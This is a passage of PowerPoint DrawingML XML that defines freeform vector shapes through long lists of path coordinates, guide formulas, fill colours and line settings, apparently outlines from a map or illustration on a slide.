                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="135"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="44"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36459" name="Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3111" y="2338"/>
                <a:ext cx="45" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 45"/>
                  <a:gd name="T1" fmla="*/ 14 h 14"/>
                  <a:gd name="T2" fmla="*/ 20 w 45"/>
                  <a:gd name="T3" fmla="*/ 13 h 14"/>
                  <a:gd name="T4" fmla="*/ 20 w 45"/>
                  <a:gd name="T5" fmla="*/ 11 h 14"/>
                  <a:gd name="T6" fmla="*/ 14 w 45"/>
                  <a:gd name="T7" fmla="*/ 9 h 14"/>
                  <a:gd name="T8" fmla="*/ 9 w 45"/>
                  <a:gd name="T9" fmla="*/ 9 h 14"/>
                  <a:gd name="T10" fmla="*/ 6 w 45"/>
                  <a:gd name="T11" fmla="*/ 8 h 14"/>
                  <a:gd name="T12" fmla="*/ 2 w 45"/>
                  <a:gd name="T13" fmla="*/ 8 h 14"/>
                  <a:gd name="T14" fmla="*/ 1 w 45"/>
                  <a:gd name="T15" fmla="*/ 8 h 14"/>
                  <a:gd name="T16" fmla="*/ 0 w 45"/>
                  <a:gd name="T17" fmla="*/ 7 h 14"/>
                  <a:gd name="T18" fmla="*/ 1 w 45"/>
                  <a:gd name="T19" fmla="*/ 2 h 14"/>
                  <a:gd name="T20" fmla="*/ 4 w 45"/>
                  <a:gd name="T21" fmla="*/ 2 h 14"/>
                  <a:gd name="T22" fmla="*/ 4 w 45"/>
                  <a:gd name="T23" fmla="*/ 1 h 14"/>
                  <a:gd name="T24" fmla="*/ 4 w 45"/>
                  <a:gd name="T25" fmla="*/ 0 h 14"/>
                  <a:gd name="T26" fmla="*/ 4 w 45"/>
                  <a:gd name="T27" fmla="*/ 0 h 14"/>
                  <a:gd name="T28" fmla="*/ 5 w 45"/>
                  <a:gd name="T29" fmla="*/ 1 h 14"/>
                  <a:gd name="T30" fmla="*/ 5 w 45"/>
                  <a:gd name="T31" fmla="*/ 2 h 14"/>
                  <a:gd name="T32" fmla="*/ 7 w 45"/>
                  <a:gd name="T33" fmla="*/ 2 h 14"/>
                  <a:gd name="T34" fmla="*/ 8 w 45"/>
                  <a:gd name="T35" fmla="*/ 3 h 14"/>
                  <a:gd name="T36" fmla="*/ 10 w 45"/>
                  <a:gd name="T37" fmla="*/ 2 h 14"/>
                  <a:gd name="T38" fmla="*/ 9 w 45"/>
                  <a:gd name="T39" fmla="*/ 2 h 14"/>
                  <a:gd name="T40" fmla="*/ 10 w 45"/>
                  <a:gd name="T41" fmla="*/ 1 h 14"/>
                  <a:gd name="T42" fmla="*/ 11 w 45"/>
                  <a:gd name="T43" fmla="*/ 2 h 14"/>
                  <a:gd name="T44" fmla="*/ 11 w 45"/>
                  <a:gd name="T45" fmla="*/ 3 h 14"/>
                  <a:gd name="T46" fmla="*/ 10 w 45"/>
                  <a:gd name="T47" fmla="*/ 3 h 14"/>
                  <a:gd name="T48" fmla="*/ 10 w 45"/>
                  <a:gd name="T49" fmla="*/ 4 h 14"/>
                  <a:gd name="T50" fmla="*/ 11 w 45"/>
                  <a:gd name="T51" fmla="*/ 4 h 14"/>
                  <a:gd name="T52" fmla="*/ 12 w 45"/>
                  <a:gd name="T53" fmla="*/ 4 h 14"/>
                  <a:gd name="T54" fmla="*/ 12 w 45"/>
                  <a:gd name="T55" fmla="*/ 4 h 14"/>
                  <a:gd name="T56" fmla="*/ 13 w 45"/>
                  <a:gd name="T57" fmla="*/ 6 h 14"/>
                  <a:gd name="T58" fmla="*/ 15 w 45"/>
                  <a:gd name="T59" fmla="*/ 6 h 14"/>
                  <a:gd name="T60" fmla="*/ 21 w 45"/>
                  <a:gd name="T61" fmla="*/ 5 h 14"/>
                  <a:gd name="T62" fmla="*/ 25 w 45"/>
                  <a:gd name="T63" fmla="*/ 5 h 14"/>
                  <a:gd name="T64" fmla="*/ 25 w 45"/>
                  <a:gd name="T65" fmla="*/ 6 h 14"/>
                  <a:gd name="T66" fmla="*/ 26 w 45"/>
                  <a:gd name="T67" fmla="*/ 6 h 14"/>
                  <a:gd name="T68" fmla="*/ 31 w 45"/>
                  <a:gd name="T69" fmla="*/ 7 h 14"/>
                  <a:gd name="T70" fmla="*/ 33 w 45"/>
                  <a:gd name="T71" fmla="*/ 7 h 14"/>
                  <a:gd name="T72" fmla="*/ 35 w 45"/>
                  <a:gd name="T73" fmla="*/ 6 h 14"/>
                  <a:gd name="T74" fmla="*/ 36 w 45"/>
                  <a:gd name="T75" fmla="*/ 7 h 14"/>
                  <a:gd name="T76" fmla="*/ 35 w 45"/>
                  <a:gd name="T77" fmla="*/ 10 h 14"/>
                  <a:gd name="T78" fmla="*/ 37 w 45"/>
                  <a:gd name="T79" fmla="*/ 11 h 14"/>
                  <a:gd name="T80" fmla="*/ 37 w 45"/>
                  <a:gd name="T81" fmla="*/ 11 h 14"/>
                  <a:gd name="T82" fmla="*/ 40 w 45"/>
                  <a:gd name="T83" fmla="*/ 9 h 14"/>
                  <a:gd name="T84" fmla="*/ 42 w 45"/>
                  <a:gd name="T85" fmla="*/ 9 h 14"/>
                  <a:gd name="T86" fmla="*/ 42 w 45"/>
                  <a:gd name="T87" fmla="*/ 9 h 14"/>
                  <a:gd name="T88" fmla="*/ 43 w 45"/>
                  <a:gd name="T89" fmla="*/ 8 h 14"/>
                  <a:gd name="T90" fmla="*/ 45 w 45"/>
                  <a:gd name="T91" fmla="*/ 7 h 14"/>
                  <a:gd name="T92" fmla="*/ 44 w 45"/>
                  <a:gd name="T93" fmla="*/ 9 h 14"/>
                  <a:gd name="T94" fmla="*/ 44 w 45"/>
                  <a:gd name="T95" fmla="*/ 10 h 14"/>
                  <a:gd name="T96" fmla="*/ 43 w 45"/>
                  <a:gd name="T97" fmla="*/ 13 h 14"/>
                  <a:gd name="T98" fmla="*/ 39 w 45"/>
                  <a:gd name="T99" fmla="*/ 12 h 14"/>
                  <a:gd name="T100" fmla="*/ 37 w 45"/>
                  <a:gd name="T101" fmla="*/ 13 h 14"/>
                  <a:gd name="T102" fmla="*/ 34 w 45"/>
                  <a:gd name="T103" fmla="*/ 13 h 14"/>
                  <a:gd name="T104" fmla="*/ 20 w 45"/>
                  <a:gd name="T105" fmla="*/ 14 h 14"/>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45"/>
                  <a:gd name="T160" fmla="*/ 0 h 14"/>
                  <a:gd name="T161" fmla="*/ 45 w 45"/>
                  <a:gd name="T162" fmla="*/ 14 h 14"/>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45" h="14">
                    <a:moveTo>
                      <a:pt x="20" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36460" name="Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3058" y="2217"/>
                <a:ext cx="104" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 104"/>
                  <a:gd name="T1" fmla="*/ 27 h 104"/>
                  <a:gd name="T2" fmla="*/ 25 w 104"/>
                  <a:gd name="T3" fmla="*/ 17 h 104"/>
                  <a:gd name="T4" fmla="*/ 37 w 104"/>
                  <a:gd name="T5" fmla="*/ 12 h 104"/>
                  <a:gd name="T6" fmla="*/ 59 w 104"/>
                  <a:gd name="T7" fmla="*/ 6 h 104"/>
                  <a:gd name="T8" fmla="*/ 83 w 104"/>
                  <a:gd name="T9" fmla="*/ 10 h 104"/>
                  <a:gd name="T10" fmla="*/ 94 w 104"/>
                  <a:gd name="T11" fmla="*/ 2 h 104"/>
                  <a:gd name="T12" fmla="*/ 103 w 104"/>
                  <a:gd name="T13" fmla="*/ 2 h 104"/>
                  <a:gd name="T14" fmla="*/ 94 w 104"/>
                  <a:gd name="T15" fmla="*/ 20 h 104"/>
